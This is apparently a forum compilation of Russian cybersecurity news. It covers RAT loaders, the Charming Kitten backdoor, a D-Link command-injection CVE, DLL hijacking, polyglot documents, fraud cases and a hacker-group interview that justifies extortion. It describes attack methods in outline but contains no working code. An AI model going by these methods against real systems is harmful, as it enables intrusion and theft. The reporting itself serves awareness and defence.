По данным J5, ESS возникла в Великобритании, но разработчики позже экспортировали его в другие страны, в том числе в США. С помощью этого программного обеспечения тысячи предприятий смогли уклониться от уплаты налогов, что является крупномасштабным мошенничеством с использованием технологий.
Австралийские власти провели обыски в 35 отдельных помещениях, подозреваемых в поставке и использовании ПО. J5 также предположил, что технология подавления продаж также продается «как оборудование, которое подключается к системам точек продаж как облачное ПО или как встроенное непосредственно в ПО».
source: irs.gov/pub/irs-utl/j5-media-release-12-9-2022.pdf
Компания «Базальт СПО» объявила о выпуске новой версии операционной системы «Альт Рабочая станция К» 10, предназначенной для использования как на домашних компьютерах, так и в корпоративной среде.
Программная платформа «Альт Рабочая станция К» 10 построена на базе Linux с использованием графического окружения KDE Plasma, стилевое оформление которого во многом схоже с интерфейсом Windows и позволяет пользователю легко адаптироваться к операционной системе. В дистрибутив ОС включены все необходимые приложения для работы в интернете, с офисными документами разных форматов, архивами, медиафайлами. Для корпоративных пользователей реализована поддержка групповых политик и возможность интеграции системы в инфраструктуру Active Directory. Платформа зарегистрирована в реестре российских программ Минцифры России и рекомендуется для использования в организациях, реализующих проекты в сфере импортозамещения ПО.
Что нового в ОС «Альт Рабочая станция К» 10
В основе операционной системы — актуальное ядро Linux 5.15 LTS (длительной поддержки). Переход на новое ядро обеспечил множество новых возможностей. В частности, улучшена работа с процессорами Intel 12-го поколения Alder Lake, добавлена поддержка видеокарт AMD на архитектуре RDNA 2, включён новый драйвер для файловой системы NTFS (рост скорости передачи данных между файловыми системами). Оптимизирована работа с классической файловой системой ext4 для Linux, увеличена производительность файловой системы Btrfs.
Обновлён графический интерфейс. Новая версия KDE Plasma 5.23 включает поддержку графической подсистемы Wayland, что обеспечивает возможность работы на планшетных компьютерах. «Альт Рабочая станция К» 10 поддерживает четыре поколения драйверов для графических процессоров NVIDIA серий 340, 390 и 470, 510. При установке ОС на компьютер с видеокартой NVIDIA нужная версия драйвера устанавливается автоматически.
Изменена схема подписи Secure Boot. Дистрибутив по-прежнему устанавливается без отключения Secure Boot.
Расширены функциональные возможности групповых политик, добавлены новые шаблоны. С помощью инструмента ADMC разработки «Базальт СПО» можно управлять доменом Active Directory и групповыми политиками.
Добавлен пакет с отечественными корневыми сертификатами шифрования.
Включены пакеты для поддержки двухфакторной аутентификации с использованием аппаратных токенов («Рутокен», JaCarta, ESMART).
Добавлены пакеты для установки совместимого отечественного ПО: ViPNet, «1С:Предприятие», «Яндекс.Браузер» и других. На сайте «Базальт СПО» можно посмотреть полный перечень совместимого с ОС «Альт» софта (как требующего дополнительных пакетов для установки, так и не требующего).
Улучшена поддержка принтеров и сканеров OKI, Brother, Epson.
В «Центр приложений» ОС добавлена поддержка репозитория Flathub для установки сторонних приложений в формате flatpak. Пользователь может работать с нужным ему софтом, не рискуя негативно повлиять на операционную систему.
Добавлена поддержка SNAP-приложений.
Включены полезные утилиты: clinfo (получение информации о статусе ускорения вычислений OpenCL), glxinfo, vulkan-tools (для проверки параметров 3D-ускорения) и многие другие.
Появилась возможность делать снимки экрана при установке.
Реализовано безопасное обновление системы. При появлении обновлений предлагается перезагрузка, при которой происходит обновление системы.
Включён кроссплатформенный фреймворк Qt 5.15 с длительным сроком поддержки (LTS). Он имеет множество новых функций. Самые значительные изменения произошли в графической части и затронули, в частности, поддержку трёхмерной графики.
Для удобства пользователей специалисты «Базальт СПО» также существенно обновили портал packages.altlinux.org с информацией о программных пакетах, доступных к установке в операционную систему.
«Мы совершенствуем ОС «Альт Рабочая станция К» 10, обеспечивая её эффективность как для домашнего, так и для профессионального применения, — отметил Антон Фарыгин, заместитель генерального директора «Базальт СПО». — Сегодня это особенно важно. Миллионы российских организаций и частных пользователей остались без сопровождения производителями зарубежных систем из- за санкций. Наши решения помогают решить эту задачу, предоставляя российским потребителям функциональную и удобную операционную систему, обладающую привычным для пользователей и системных администраторов функционалом. В десятой версии «Альт Рабочая станция К» мы уделили особое внимание удобству использования, дизайну интерфейса и вопросам интеграции в существующую ИТ инфраструктуру предприятия».
Оценить перечисленные новшества ОС «Альт Рабочая станция К» 10 можно, скачав установочный образ с сайта «Базальт СПО». Для домашнего использования операционная система предлагается совершенно бесплатно, а организациям необходимо приобрести лицензию. Вместе с платформой пользователи получат набор фонов рабочего стола — фотопейзажей России. Эти снимки отечественных фотографов признаны победителями 35AWARDS, крупной международной премии профессионального фотосообщества 35photo.pro.
По-прежнему доступен режим LiveCD двух видов. Первый — на установочном образе размещён вариант загрузки «живой» системы — можно опробовать совместимость ОС с оборудованием пользователя или воспользоваться утилитами восстановления работоспособности системы. Второй — на отдельном образе размещена «живая» система, с которой можно работать без установки на жёсткий диск, но с возможностью сохранения данных.
Всем пользователям, купившим «Альт Рабочая станция К» 9 после 01.09.2021, предоставляется апгрейд за 10 % от стоимости «Альт Рабочая станция К» 10. Такой же льготный апгрейд доступен и всем, кто приобрёл годовую (стандартную или расширенную) поддержку на «Альт Рабочая станция». Техническое обновление с версии 9.2 до 10 возможно. Организациям, использующим «Альт Рабочая станция К» версии 9 с базовой поддержкой, при переходе на версию 10 необходимо отдельно приобрести поддержку для версии 10. Подробную информацию о приобретении программного продукта можно получить в отделе продаж «Базальт СПО»
Название конечно имеет отдельный уровень понимания
источник: [https://3dnews.ru/1065770/bolshoe-o...iz-rossiyskoy-os-alt- rabochaya-stantsiya-k-10](https://3dnews.ru/1065770/bolshoe-obnovlenie- sostoyalsya-reliz-rossiyskoy-os-alt-rabochaya-stantsiya-k-10)
Хакеры атаковали сайт государственного информационного агентства ЛНР
Мощнейшая атака хакеров произошла на сайт Луганского информационного центра (ЛИЦ). Об этом рассказал главный редактор центра Сергей Мешковой.
Хакерская атака произошла поздно вечером 8 февраля. Система защиты среагировала на действия злоумышленников. Однако они оказались настолько сильными, что для отражения атаки пришлось подключить технических специалистов агентства.
«Около часа назад сайт государственного информационного агентства ЛИЦ подвергся мощнейшей DoS-атаке. Система защиты, которая есть в агентстве, сработала, но атака была настолько мощной, что сейчас технические сотрудники агентства ведут работы, чтобы отразить эту атаку», — цитирует Мешкового РИА Новости.
Click to expand...
Видеохостинг YouTube ранее заблокировал каналы Луганского информационного центра, Гостелерадиокомпании ЛНР и Народных милиций ЛДНР. Глава республики Леонид Пасечник [назвал ](https://riafan.ru/1601337-glava-lnr-pasechnik- vyskazalsya-o-blokirovke-youtube-kanalov-respubliki)произошедшее информационной борьбой без правил.
В конце августа в даркнете вновь появилась крупная база с личными данными сотен тысяч пассажиров российской Utair. Авторами слива оказались хакеры из иранской киберпреступной группировки Arvin Club. Они утверждают, что их интересует не заработок — для них гораздо важнее указывать организациям на серьезные пробелы в защите. И только если компания игнорирует все предупреждения и не устраняет обнаруженные бреши, Arvin Club начинает полноценную атаку, требуя с нее выкуп. Группировка базируется в Иране и регулярно получает от США обвинения в связях с правительством этой страны. Главный администратор Arvin Club Али согласился ответить на вопросы «Ленты.ру» и рассказал о связях киберпреступников с правительством, атаках на Россию и о том, как Arvin наказывают тех, кто их игнорирует.
«Лента.ру»: Многие эксперты полагают, что пандемия стала для киберпреступников временем возможностей: слабо защищенные компании начали переходить на удаленный формат работы, оставляя бреши в инфраструктуре информационной безопасности. Это так?
Али: Это действительно так. Во время пандемии хакеры получили гораздо больше возможностей для того, чтобы совершать атаки на самый широкий круг компьютерных систем. Вокруг достаточно много примеров, подтверждающих это.
Как группировка Arvin Club воспользовалась этой ситуацией? Какие крупные атаки вы провели за последние полтора года?
Одна из наших последних целей — Лейденский университет в Нидерландах. Я лично совершил множество атак, но значительная их часть не стала достоянием общественности ни в Иране, ни в других странах. В некоторых случаях группировки, специализирующиеся на программах-вымогателях, были заинтересованы в приобретении полученных нами прав доступа. Но мы их не продавали.
Какое программное обеспечение вы используете в своих атаках?
Мы применяем самые разнообразные инструменты, например Cobalt Strike, nmap, Metasploit, Burp Suite.
Какой выкуп вы обычно требуете у своих жертв?
На самом деле мы не вымогаем деньги у наших жертв, кроме тех случаев, когда они не прислушиваются к нашим рекомендациям. Тот же Лейденский университет мы неоднократно предупреждали о том, что их сервер и веб-сайт небезопасны, но они проигнорировали нас. После этого мы были вынуждены потребовать выкуп. Но мы не вымогатели.
Сколько суммарно зарабатывает обычный член Arvin Club в неделю, в месяц или в год?
Я не могу назвать конкретную сумму, но это хорошие деньги.
«Наша цель — не деньги»
Ваш бизнес для вас — это только способ заработка? Или еще и попытка донести свои ценности до мира?
Наша цель — вовсе не получение прибыли. Для нас важнее обучение и передача опыта.
Многим членам киберпреступных группировок в странах бывшего СССР близки идеи всеобщего равенства и социализма. Близки ли они вам?
Ни в коем случае. Идеи, которые продвигают наши товарищи с постсоветского пространства, годами разрушали мою страну. Конечно, все мы любим свободу и равенство, но левая идеология нанесла сокрушительный удар по нашему обществу.
А что ты в таком случае думаешь о хактивизме?
Здесь у меня обратная позиция: хактивизм — положительное явление, и меня радует, что оно находит себе новых сторонников в Иране.
Некоторое время назад США обвинили вас в связях с иранским правительством. Как ты можешь это прокомментировать?
Эти обвинения нелепы и бессмысленны. Чтобы стать жертвой подобных нападок, достаточно просто родиться в Иране, уж поверьте мне. Из-за политики, проводимой нашим государством, США по умолчанию считают тебя или террористом, или пособником иранского правительства. Фактически наше преступление в том, что мы иранцы.
Мы не сотрудничаем ни с одним государством. Будьте уверены, если бы иранские правоохранительные органы знали, где нас искать, мы бы уже были арестованы.
Arvin Club когда-нибудь проводила атаки на объекты критической инфраструктуры в США?
Нет, но у нас были другие цели в Америке. Мы предупредили их о существующих уязвимостях, после чего недостатки в защите были исправлены.
Один ваш русскоязычный коллега считает, что Америка просто назначает виновных в киберпреступлениях, не приводя при этом никаких доказательств. Из вашей страны ситуация выглядит так же?
Да, все именно так. На это указывают постоянные безосновательные утверждения США.
«Для мира наступают темные времена»
В даркнете несколько раз мелькали предположения, что у вас может быть налажено сотрудничество с киберпреступными группировками из других стран, в том числе и из России. Так ли это?
Мы находимся на связи с нашими друзьями из других стран, но мы не сотрудничаем с ними.
Правда ли, что все киберпреступные группировки интернациональны? Есть ли в вашем сообществе хоть один русскоязычный специалист?
Я бы не сказал, что абсолютно все хакерские сообщества интернациональны. Но в нашей группировке действительно есть русскоговорящий человек.
Проводили ли вы когда-либо атаки на российские компании и органы власти?
Да, у нас были цели в России, но, если честно, они нам не очень интересны по разным причинам. В вашу страну мы заглядывали больше из любопытства.
Многие хакеры отказываются атаковать социальные объекты, в том числе относящиеся к системе образования. Но вы недавно провели атаку на Лейденский университет. Почему?
Наша принципиальная задача — тестировать системы образовательных и даже государственных учреждений на проникновение. После проверки мы всегда предупреждаем их о наличии проблем, чтобы повысить безопасность систем.
Если говорить именно про Лейденский университет, то его руководство не отреагировало на наши предупреждения. Это говорит о том, что администрации безразлична сохранность данных своих студентов и сотрудников. Именно поэтому мы решили наказать этот университет.
Почему компании, производящие инструменты для повышения информационной безопасности, не могут победить киберпреступников? Можно ли сказать, что хакеры всегда находятся на шаг впереди?
Я бы сказал, что хакеры всегда были и всегда будут на шаг впереди. Этим компаниям следует использовать другие подходы.
Что ты скажешь о Tor, который считается главным браузером даркнета, и других подобных проектах?
Я советую всем использовать Tor вне зависимости от того, живут они в такой репрессивной стране, как моя, или в Соединенных Штатах. Обращаюсь ко всем читателям: пожертвуйте деньги этому проекту и всячески способствуйте его развитию!
Каким вам видится будущее модели Ransomware as a Service? Что изменится в даркнете вместе с ростом ее популярности?
Из-за этого каждый день в даркнете появляются все новые и новые люди, которые используют программы-вымогатели. Это не принесет миру ничего хорошего. Наступают действительно темные времена.
Microsoft предупредила о киберкампании, в ходе которой злоумышленники атакуют целевым фишингом аэрокосмические и туристические организации. Интересной особенностью этих атак является использование нового загрузчика, доставляющего на компьютеры жертв трояны (RAT).
По словам Microsoft, наблюдавшей за активностью преступников последние несколько месяцев, вредоносная кампания весьма динамична. В качестве приманки используются PDF-документы, которые якобы напрямую связаны с деятельностью организаций аэрокосмического, туристического и промышленного секторов.
Как выяснили в ходе наблюдения специалисты, конечной целью злоумышленников была кража важных данных из скомпрометированных устройств. Для этого как раз используются RAT-вредоносы, способные фиксировать нажатия клавиш (кейлогер) и красть пароли сотрудников.
Помимо этого, операторы троянов получают возможность снимать скриншоты, записывать видео при помощи веб-камеры, мониторить буфер обмена и браузер, анализировать информацию о системе. Все сведения передаются через SMTP-порт 587.
Новый загрузчик получил имя «[Snip3](https://blog.morphisec.com/revealing-the- snip3-crypter-a-highly-evasive-rat-loader)» (классификация Morphisec), именно он отвечает за установку в систему следующих вредоносов: Revenge RAT, AsyncRAT, Agent Tesla и NetWire RAT. Первым шагом в дело включаются VBS-файлы, которые по цепочке привлекают скрипт PowerShell.
При этом Snip3 способен вычислять присутствие песочницы или виртуальной среды, что позволяет ему препятствовать детектированию и анализу.
Независимый исследователь кибербезопасности под псевдонимом «Netsecfish» обнаружил серьёзную уязвимость в нескольких моделях сетевых хранилищ D-Link, которые больше не поддерживаются производителем. Проблема заключается в скрипте «/cgi-bin/nas_sharing.cgi», влияющем на компонент обработчика HTTP GET запросов.
Уязвимость, получившая обозначение CVE-2024-3273, связана с наличием встроенного в программное обеспечение аккаунта (имя пользователя «messagebus» без пароля) и возможностью инъекции команд через параметр «system». Это позволяет злоумышленникам удалённо выполнять команды на устройстве.
Пример PoC-эксплойта, опубликованного исследователем, наглядно показывает, как добавление команды в кодировке base64 к параметру «system» приводит к её выполнению на устройстве.
Белый хакер предупреждает, что успешное использование этой уязвимости может привести к несанкционированному доступу к чувствительной информации, изменению настроек системы или созданием условий для проведения атаки типа «отказ в обслуживании».
Модели устройств, на которые влияет CVE-2024-3273, следующие:
По данным Netsecfish, в сети обнаружено более 92 000 уязвимых устройств D-Link, подверженных риску атак через эту уязвимость.
Компания D-Link сообщила, что устройства достигли конца своего жизненного цикла и больше не поддерживаются. Производитель рекомендует заменить устаревшие устройства на те модели, которые ещё будут получать обновления прошивки.
На своём официальном сайте D-Link также опубликовала бюллетень безопасности, чтобы повысить осведомлённость клиентов об уязвимости. А на специальной странице поддержки для устаревших устройств пользователи могут найти самые последние из выпушенных обновления безопасности и прошивки, доступные для моделей оборудования, поддержка которых была официально прекращена производителем.
Компания также подчёркивает, что NAS-накопители никогда не должны быть доступны из интернета, поскольку они часто становятся целью для кражи данных или атак с использованием программ-вымогателей.
Фигурантом ряда уголовных дел стал 20-летний житель Глазуновского района. Молодой человек подозревается в неправомерном доступе к охраняемой законом компьютерной информации и мошенничестве.
В органы внутренних дел поступило семь заявлений от граждан, в которых те сообщали, что на их имя без их ведома взяты займы на небольшие суммы в различных микрофинансовых организациях. Заявки на данные действия были совершены с аккаунтов заявителей на портале «Госуслуги».
Следственными отделами УМВД России по городу Орлу и ОП № 3 (по Северному району) а также подразделениями дознания городского УМВД возбуждены уголовные дела по признакам преступлений, предусмотренных частью 2 статьи 272 УК РФ «Неправомерный доступ к компьютерной информации» и статьей 159.1 УК РФ «Мошенничество в сфере кредитования».
В результате проведения оперативно-розыскных и технических мероприятий сотрудники отдела по борьбе с киберпреступлениями (ОБК) УМВД России по Орловской области установили, что вход в аккаунты потерпевших был осуществлен с ip-адреса жителя Глазуновского района – гражданина 2003 года рождения.
Предварительно установлено, что злоумышленник незаконно получил сведения, а затем приобрел несколько ранее заблокированных сим-карт граждан, к номерам которых ранее были «привязаны» их учетные записи в информационной системе. Подозреваемый использовал анкетные данные прежних владельцев сим-карт для оформления семи микрокредитов. Полученные денежные средства злоумышленник сначала переводил на свои счета и счета знакомых, а затем распоряжался ими по своему усмотрению.
Устанавливается причастность подозреваемого к другим подобным эпизодам противоправной деятельности.
Пресс-служба УМВД россии по Орловской области
Register to site connect your mega nz and gmail to transfer files to google drive then you can download you can download 1 by 1 to
site:https://www.ricedrive.com/
and here is good tutorials site
site :https://mega.nz/folder/0C9wDbjZ#nJW3uR5iphIT0GRObZPe3w
Иранская киберпреступная группировка Charming Kitten (также известная как Phosphorous, APT35 или TA453) обновила свой арсенал вредоносных инструментов, включив в него новый имплантат на основе PowerShell под названием PowerLess.
«PowerShell-код работает в контексте приложения .NET, поэтому не запускает powershell.ex и способен обойти защитные решения. Проанализированный набор инструментов включает модульное, многоступенчатое вредоносное ПО, которое расшифровывает и развертывает дополнительные полезные нагрузки в несколько этапов для обеспечения скрытности и эффективности», — сообщил старший исследователь вредоносных программ в Cybereason Дэниел Франк (Daniel Frank).
Новый бэкдор PowerLess способен загружать и выполнять дополнительные модули, такие как инфостилеры и кейлоггеры. Кроме того, с тем же разработчиком бэкдора потенциально могут быть связаны ряд других артефактов вредоносного ПО, включая аудиозаписывающий модуль, более ранний вариант инфостилера и то, что исследователи считают незавершенным вариантом программы-вымогателя на языке .NET.
Эксперты также выявили связь между инфраструктурой Charming Kitten и новой разновидностью программы-вымогателя под названием Mement. Операторы вымогателя придумали интересную тактику — полностью отказаться от шифрования и переместить файлы в архивы, защищенные паролем. Теперь группировка перемещает файлы в WinRAR-архивы, устанавливает неверный пароль для защиты доступа, шифрует этот ключ и удаляет исходные файлы.
«Активность Charming Kitten в отношении ProxyShell происходила примерно в то же время, что и Memento. В этот период иранские злоумышленники использовали программамы-вымогатели, что подтверждает гипотезу о связи с Memento», — отметил Франк.
• Source: [https://www.cybereason.com/blog/pow...us-adds-new-powershell- backdoor-for-espionage](https://www.cybereason.com/blog/powerless-trojan- iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage)
Всего за последние четыре месяца число инцидентов с копированием голоса возросло на 60%.
Число мошенников с инструментами для копирования голоса стремительно растет. У преступников есть множество материалов для обучения алгоритмов искусственного интеллекта, включая аудиоклипы, подкасты и online-презентации. Достаточно 45 минут звука, чтобы технология научилась имитировать голос. Об этом сообщило издание Fortune.
По словам экспертов из ИБ-фирмы Secure Anchor, всего за последние четыре месяца число подобных инцидентов возросло на 60%. 17 компаний потеряли в среднем по $175 тыс. из-за мошенничества с копированием голоса, а в одном случае хакеры получили доступ к IT-системам предприятия.
Возможно, лучшим способом бороться с подобными мошенниками будет разработка протоколов и правил, определяющих условия перевода денежных средств, а также установление ограничений на суммы. Например, после звонка с просьбой предоставить деньги, пароли или другую важную информацию, сотрудники должны подтвердить эти запросы, позвонив с другого телефона на номер телефона звонящего.
Руководители могут также рассмотреть возможность использования сменных кодовых слов для денежных переводов. Мошенники могут скопировать голос, однако они вряд ли смогут ответить на специальные вопросы.
В Красноярске 25-летнего местного жителя осудили за неправомерный оборот средств платежей. Как рассказали в прокуратуре, он выступил фактическим посредником мошенников.
Установлено, что в начале 2024 года молодому человеку в соцсетях поступило предложение подзаработать. За предоставление доступа к онлайн-банку и своему счету неизвестный пользователь пообещал ему 5 тысяч рублей. Красноярец согласился.
«Так карта и попала в руки злоумышленников, сделавших имя „виновника“ посредником в преступной цепи. Через нее аферисты после незаконного получения сумм обналичивали их, либо переводили на другие банковские счета», — рассказали в прокуратуре.
Click to expand...
Киберпреступники продают в Telegram кастомный софт для Raspberry Pi —GEOBOX.
Он позволяет даже малоквалифицированным хакерам превратить одноплатный компьютер в инструмент для кибератак. В соответствующих телеграм-каналах можно приобрести GEOBOX за 700 долларов (пожизненная лицензия), при этом есть возможность платить по 80 долларов в месяц, если вам ближе модель подписки.

На кастомный софт наткнулись специалисты компании Resecurity в ходе расследования серьёзного киберинцидента, затронувшего компанию из списка Fortune 100.
«Чтобы подробнее изучить GEOBOX, мы приобрели его. Выяснилось, что киберпреступники используют несколько GEOBOX-устройств, каждое из которых подключено к Сети. Эти девайсы стратегически размещены в разных удалённых местах», — пишут в отчёте аналитики.
«Устройства выступают в качестве прокси, обеспечивая анонимность. Подобный подход затрудняет расследование и отслеживание активности злоумышленников. Более того, GEOBOX-девайсы не хранят логов».
Click to expand...
Исследователи также отметили, что киберпреступный софт обладает богатым набором функциональных возможностей и вполне способен затруднить работу правоохранительных органов при расследовании киберпреступлений.
Resecurity расписала основную функциональность GEOBOX по пунктам:
Есть мнение, что противостояние хакеров и создателей программного обеспечения никогда не закончится. Поговаривают, что любой код, который написал человек, можно взломать, а проблема только в поиске талантливого и мотивированного специалиста. Вполне возможно, что уже вскоре на страже нашей безопасности встанет продвинутый ИИ, но пока люди сражаются с противником, победить которого почти невозможно. Принято считать, что хакерами движет не только желание заработать, но и попытка привлечь к себе внимание. Многие известные хакеры обладают примитивными навыками социализации в реальном мире, поэтому надеются при помощи взломов доказать свою значимость кумирам из мира виртуального Со временем детские комплексы забываются, а оставшиеся в строю хакеры вливаются в тайные группировки, занимающиеся во взломах крупных компаний. Эти ребята лишены принципов, о которых так много говорят в фильмах на эту тематику, а жертвами их выступают больницы, школы и другие социальные заведения.
В последнее время всё чаще пишут о так называемых белых хакерах, которые пытаются бороться со своими тёмными собратьями, а также выступают консультантами в тех или иных структурах. Кто-то работает на правительство, тогда как другие обладают узкой специализацией, помогая находить в популярном ПО скрытые уязвимости. Порой белые хакеры получают за свою работу миллионы долларов, при этом занимаются любимым делом и не нарушают закон. Похоже, иногда соблазн может оказаться настолько значительным, что даже белые хакеры начинают понемногу чернеть. По данным издания 404 Media, недавно был задержан некий Ной Роскин-Фрейзи ( Noah Roskin -Frazee ) , который умудрился нанести компании Apple урон в 3 миллиона долларов. Оказывается, Ной был специалистом по безопасности и ранее отличился тем, что обнаружил множество уязвимостей в работе яблочной компании. Парень проживал в Сан-Франциско, где и был задержан 11 января. Ему предъявлено уголовное обвинение во взломе и мошенничестве, а вместе с ним был также арестован некий Кит Латтери из Нью- Джерси. В прессе отмечается, что Роскин-Фрейзи долгое время числился в компании на хорошем счету. Он специализировался на поиске уязвимостей в macOS Ventura и macOS Sonoma, где совершил ряд важных находок. Похоже, в рабочее время Ной работал в качестве белого хакера, ну а дома играл совершенно другую роль.
Схема, которую придумал Роскин-Фрейзи, действовала с декабря 2018 года по март 2019 года. Он создал инструмент сброса пароля для доступа к учётной записи сотрудника одной из компании, предоставляющей поддержку клиентам Apple. Далее обвиняемые получили доступ к VPN-серверам компании, что дало им возможность проникнуть в системы Apple и размещать фальшивые заказы. Во время подобных действий мошенники обнуляли стоимость заказов, добавляли продукты к оплаченным заказам, продлевали контракты на обслуживание без оплаты и занимались другими противозаконными действиями. Хакеры создавали фиктивные учётные записи и использовали одноразовые адреса электронной почты, что позволяло им оставаться незамеченными и не привлекать к себе лишнего внимания. За выполненные заказы обвиняемые получили свыше 2.5 миллиона долларов в виде электронных подарочных карт. Кроме того, им причиталось порядка 100 тысяч долларов в виде продуктов и услуг. Часть из полученных карт и продуктов была перепродана третьим лицам, включая отправку ноутбуков стороннему продавцу электроники. Согласно официальным заявлениям, общий ущерб от указанной выше схемы достигает 3 миллиона долларов.
Что примечательно, хакеров не могли найти много лет, а сами они так умело скрыли следы, что даже начали верить в полную безнаказанность. В прессе не пишут, что оба хакера оставили свои тёмные дела позади и даже не предполагали, что окажутся под подозрением. В Apple не раскрывают деталей дела, но есть крайне любопытные подробности. Так, 22 января (а это через 10 дней после ареста), яблочная компании опубликовала пресс-релиз с благодарностью команде службы безопасности. В числе тех, кто приложил немало усилий для обеспечения безопасной работы Apple и поиска уязвимостей, названы оба обвиняемых. Можно предположить, что в компании не были осведомлены о действиях своих сотрудников, а значит мошенниками занимался вышестоящий отдел, сотрудничающий с правоохранительными органами.
sc: 404media.co/security-researcher-allegedly-hacked-apples-backend- scammed-2-5-million
Советский районный суд Брянска признал виновным мужчину, который пытался атаковать различные IP-адреса, в том числе органов государственной власти, для получения логинов и паролей. Об этом ТАСС сообщили в пресс-службе УФСБ России по Брянской области.
"[Мужчина], находясь на рабочем месте в одном из юридических лиц города Брянска, при помощи вредоносного программного обеспечения осуществлял компьютерные атаки на различные IP-адреса, в том числе органов государственной власти РФ, с целью получения логинно-парольных комбинаций для доступа к атакуемым системам. <...> Советским районным судом Брянска обвиняемый <...> приговорен к ограничению свободы сроком на один год", - говорится в сообщении.
Уточняется, что мужчина признан виновным по ч. 2 ст. 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ)
В июле 2023 года японская команда по чрезвычайным ситуациям в компьютерной безопасности (Japan’s computer emergency response team, JPCERT) обнаружила новый тип кибератак, в котором используются так называемые «полиглот файлы». Они объединяют в себе признаки PDF и Word документов, что позволяет легко обходить системы безопасности.
Разные приложения определяют «полиглотов» как файлы разных типов. Они могут выглядеть совершенно безвредными, если их рассматривать как документ одного формата, но при этом содержать вредоносный код в другом формате.
Образец, проанализированный JPCERT, представляет собой «полиглот», который большинство сканирующих инструментов распознают как PDF. Однако, если файл открыть через офисное приложение он будет функционировать как обычный Word документ (.doc). Для офисных сотрудников этот формат более привычен. Когда программа открыта, она активирует встроенный VBS макрос для загрузки и установки вредоносного ПО.
Стоит отметить, что эта кибератака не сработает, если в параметрах Microsoft Office запрещено автоматическое выполнение макросов. Пользователи, у которых такие настройки включены, будут в относительной безопасности.
Среди инструментов, способных обнаружить «полиглотов», JPCERT выделяет программу «OLEVBA». Алгоритм анализирует сложную структуру файла и может выявить вложенные элементы, содержащие вредоносный код.
Кроме того, команда разработала специальные правила для программы Yara — набор сигнатур, помогающих быстро распознавать подозрительные объекты.
На YouTube доступно видео, в котором эксперты показывают, как работают полиглот-атаки. Хотя такое явление, как «двуликие» документы, давно известно специалистам, специфический метод, представленный JPCERT, отличается новизной и поднимает вопрос о необходимости усиления мер безопасности.
ИБ-специалисты сообщают, что китайская хак-группа Bronze Starlight атакует индустрию азартных игр в странах Юго-Восточной Азии с помощью малвари, подписанной с использованием действительного сертификата VPN-провайдера Ivacy.
Использование действительного сертификата позволяет хакерам обходить защиту, избегать подозрений и системных предупреждений, а также смешиваться с легитимным ПО и его трафиком.
Кибератаки Bronze Starlight начались еще в марте 2023 года, и вероятно, являются продолжением хакерской операции [ChattyGoblin](https://www.eset.com/int/about/newsroom/press- releases/research/eset-apt-activity-report-attacks-by-china-north-korea-and- iran-aligned-threat-actors-russia-eyes-ukr/), которую в конце 2022 года обнаружила компания ESET.
Как теперь рассказывают аналитики [SentinelLabs](https://www.sentinelone.com/labs/chinese-entanglement-dll- hijacking-in-the-asian-gambling-sector/), атаки группировки начинаются с доставки исполняемых файлов .NET (agentupdate_plugins.exe и AdventureQuest.exe) в целевую систему. Скорее всего, это происходит через троянизированные чат-приложения, которые извлекают защищенные паролем ZIP- архивы из бакетов Alibaba.
Содержимое архивов
Образец малвари AdventureQuest.exe был впервые замечен ИБ-исследователем
MalwareHunterteam
в мае текущего года, когда тот обратил внимание, что сертификат для подписи
кода малвари был таким же, как и у официальных установщиков Ivacy VPN.
Вышеупомянутые архивы содержат нарочито уязвимые версии ПО, включая Adobe Creative Cloud, Microsoft Edge и McAfee VirusScan, которые подвержены атакам типа DLL hijacking. Группа Bronze Starlight использует эти уязвимые приложения для развертывания маяков Cobalt Strike в целевых системах.
Вредоносные библиотеки DLL (libcef.dll, msedge_elf.dll и LockDown.dll) упакованы в архивы вместе с легитимными программами, и Windows отдает приоритет по выполнению им, не более безопасными версиям тех же DLL, хранящихся в C:\Windows\System32, тем самым позволяя злоумышленникам запускать вредоносный код.
SentinelLabs отмечает, что файлы .NET имеют ограничения, которые предотвращают запуск вредоносного ПО в США, Германии, Франции, России, Индии, Канаде или Великобритании, однако из-за ошибки в коде эти ограничения не работают.
Наиболее интересным аспектом этой кампании все же является использование сертификата, который принадлежит фирме PMG PTE LTD, стоящей за Ivacy VPN. Этот же сертификат используется для подписания официального установщика Ivacy VPN, ссылка на который размещена [на официальном сайте](https://web.archive.org/web/20230508121320/https:/www.ivacy.com/download- vpn/vpn-for-windows/) VPN-провайдера.
«Вполне вероятно, что в какой-то момент ключ подписи PMG PTE LTD был украден, это известный метод, используемый китайскими злоумышленниками для подписания вредоносного ПО, — отмечают эксперты. — VPN-провайдеры являются интересными целями для хакеров, поскольку они предоставляют злоумышленникам гарантированный доступ к конфиденциальным пользовательским данным и сообщениям».
Click to expand...
Если сертификат был украден, исследователи беспокоятся о том, что еще злоумышленники в целом могли иметь доступ к сети VPN-провайдера. Стоит сказать, что представители PMG PTE LTD не отреагировали на заявления специалистов, поэтому неясно, как именно хакеры могли получить доступ к сертификату.
Тем временем, еще в начале июня 2023 года DigiCert отозвал и признал сертификат недействительным из-за нарушения принципов «Базовых требований» (Baseline Requirements).
Исследователи из команды Google Project Zero [разработали метод](https://googleprojectzero.blogspot.com/2023/01/exploiting-null- dereferences-in-linux.html) эксплуатации уязвимостей в ядре Linux, вызванных разыменованием указателей NULL. До сих пор проблемам в ядре, связанным с разыменованием указателей NULL, не уделялось должного внимания, так как доведение таких проблем до атак, приводящих к повышению привилегий или выполнению своего кода, считалось нереалистичным (непривилегированным процессам запрещён маппинг в нижней области адресного пространства). Как правило подобные ошибки приводят к генерации ядром oops-предупреждений, после которых проблемные задачи завершаются и состояние восстанавливается без необходимости остановки работы системы.
Новый метод атаки основывается на особенности обработки состояний "oops", в результате которых можно добиться увеличения значения счётчика ссылок (refcount), что в свою очередь может привести к переполнению счётчика и освобождению памяти, связанной с refcount. В этом случае эксплуатация сводится к манипуляциям, типичным для атак use-after-free (возникает ситуация, когда у объекта счётчик ссылок становится равен нулю, память освобождается, но фактически остаются рабочие ссылки, указывающие на освобождённую память).
Разыменование указателя NULL в данном случае используется как способ управляемой генерации состояния "oops". Проблема состоит в том, что для достижения переполнения 32-разрядного refcount требуется примерно 2^32 вызовов состояния "oops". С практической стороны для проведения атаки при помощи предложенного эксплоита требуется около 8 дней непрерывной генерации состояний "oops". В случае успеха эксплоит позволяет добиться выполнения своего кода на уровне ядра.
